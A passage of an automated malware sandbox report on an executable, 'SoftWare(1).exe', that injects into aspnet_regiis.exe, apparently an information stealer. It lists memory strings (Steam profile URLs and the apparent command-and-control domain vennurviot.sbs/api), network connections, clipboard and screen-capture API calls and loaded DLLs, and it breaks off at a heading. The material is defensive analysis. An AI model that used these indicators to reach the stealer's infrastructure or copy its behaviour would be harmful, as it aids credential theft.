    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vennurviot.sbs/
    Source: aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vennurviot.sbs/&
    Source: aspnet_regiis.exe, 00000002.00000003.1715514677.0000000002955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vennurviot.sbs/api
    Source: aspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: aspnet_regiis.exe, 00000002.00000003.1780251283.00000000029B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-man2
    Source: aspnet_regiis.exe, 00000002.00000003.1780094391.00000000029B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1779136143.00000000029AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: aspnet_regiis.exe, 00000002.00000003.1779034737.00000000029DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownHTTPS traffic detected: 104.21.28.222:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.152.13:443 -> 192.168.2.4:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.4:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.46.170:443 -> 192.168.2.4:49734 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.30.221:443 -> 192.168.2.4:49735 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.141.136:443 -> 192.168.2.4:49736 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49739 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49740 version: TLS 1.2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00584BE0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00584BE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00584BE0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00584BE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00584D70 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00584D70

    System Summary

    barindex
    Source: SoftWare(1).exeStatic PE information: section name: 'H{_AE
    Source: SoftWare(1).exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF4BEA0 GetModuleHandleW,NtQueryInformationProcess,0_2_6CF4BEA0
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF4C4F00_2_6CF4C4F0
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF4A5400_2_6CF4A540
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF4BEA00_2_6CF4BEA0
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF550D00_2_6CF550D0
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF5C4B00_2_6CF5C4B0
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF464A00_2_6CF464A0
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF564900_2_6CF56490
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF598800_2_6CF59880
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF58C600_2_6CF58C60
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF5E4400_2_6CF5E440
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF560400_2_6CF56040
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF5AC300_2_6CF5AC30
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF590000_2_6CF59000
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF54DC00_2_6CF54DC0
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF6B9970_2_6CF6B997
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF589300_2_6CF58930
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF5C1100_2_6CF5C110
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF592F00_2_6CF592F0
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF452C00_2_6CF452C0
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF542C00_2_6CF542C0
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF57EB00_2_6CF57EB0
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF59E900_2_6CF59E90
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF55E300_2_6CF55E30
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF5AFD00_2_6CF5AFD0
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF583900_2_6CF58390
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF5EB600_2_6CF5EB60
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF56F400_2_6CF56F40
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF5D3300_2_6CF5D330
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF5B7100_2_6CF5B710
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: 0_2_6CF57B000_2_6CF57B00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0058A4292_2_0058A429
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0059162C2_2_0059162C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00560B702_2_00560B70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0055ECA02_2_0055ECA0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0058AD602_2_0058AD60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0055CE802_2_0055CE80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005610482_2_00561048
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005510002_2_00551000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0057E0302_2_0057E030
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0055B0F02_2_0055B0F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005930902_2_00593090
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005881CE2_2_005881CE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005921C02_2_005921C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005512D52_2_005512D5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005943402_2_00594340
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005713602_2_00571360
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0056E3232_2_0056E323
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0055132D2_2_0055132D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005794672_2_00579467
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005934302_2_00593430
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005764CB2_2_005764CB
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005724802_2_00572480
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0057B5252_2_0057B525
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005946002_2_00594600
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0057560E2_2_0057560E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005776D02_2_005776D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005926E02_2_005926E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0057A68D2_2_0057A68D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0057F7762_2_0057F776
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005807282_2_00580728
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0057E8502_2_0057E850
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005898202_2_00589820
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0057C8D72_2_0057C8D7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005598DE2_2_005598DE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005538E02_2_005538E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0055C9502_2_0055C950
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0058E9002_2_0058E900
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005949002_2_00594900
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005739D02_2_005739D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_005579E02_2_005579E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0058A9E02_2_0058A9E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0057BB502_2_0057BB50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0057AB6E2_2_0057AB6E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00588B672_2_00588B67
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00592B802_2_00592B80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00582C702_2_00582C70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0055AC602_2_0055AC60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00594C102_2_00594C10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0055BC002_2_0055BC00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00577CE32_2_00577CE3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0056DC9E2_2_0056DC9E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00559C8C2_2_00559C8C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00571D702_2_00571D70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0057CD602_2_0057CD60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00576D282_2_00576D28
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00558DC02_2_00558DC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00579DA02_2_00579DA0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0056EEE02_2_0056EEE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00582E802_2_00582E80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00580E872_2_00580E87
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00592EA02_2_00592EA0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00564F0C2_2_00564F0C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00576F202_2_00576F20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00580FD02_2_00580FD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00556FC02_2_00556FC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00559FC02_2_00559FC0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0057AFE32_2_0057AFE3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00592F902_2_00592F90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00554FA02_2_00554FA0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 0055DF80 appears 217 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 0055C740 appears 62 times
    Source: C:\Users\user\Desktop\SoftWare(1).exeCode function: String function: 6CF5F800 appears 33 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 280 -s 1724
    Source: SoftWare(1).exe, 00000000.00000002.1682123078.00000000013BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SoftWare(1).exe
    Source: SoftWare(1).exeBinary or memory string: OriginalFilenameVioletTrumpAmerica176Zachary.uPIH vs SoftWare(1).exe
    Source: SoftWare(1).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: SoftWare(1).exeStatic PE information: Section: 'H{_AE ZLIB complexity 1.0003328476688103
    Source: classification engineClassification label: mal100.troj.evad.winEXE@5/7@11/9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0058A260 CoCreateInstance,2_2_0058A260
    Source: C:\Users\user\Desktop\SoftWare(1).exeFile created: C:\Users\user\AppData\Roaming\msvcp110.dllJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeMutant created: NULL
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess280
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\c2971479-67ca-4e2c-9d71-3fc063496a05Jump to behavior
    Source: SoftWare(1).exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
    Source: C:\Users\user\Desktop\SoftWare(1).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: SoftWare(1).exeReversingLabs: Detection: 21%
    Source: SoftWare(1).exeVirustotal: Detection: 32%
    Source: unknownProcess created: C:\Users\user\Desktop\SoftWare(1).exe "C:\Users\user\Desktop\SoftWare(1).exe"
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 280 -s 1724
    Source: C:\Users\user\Desktop\SoftWare(1).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\SoftWare(1).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
    Source: SoftWare(1).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: SoftWare(1).exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

    Data Obfuscation

    barindex
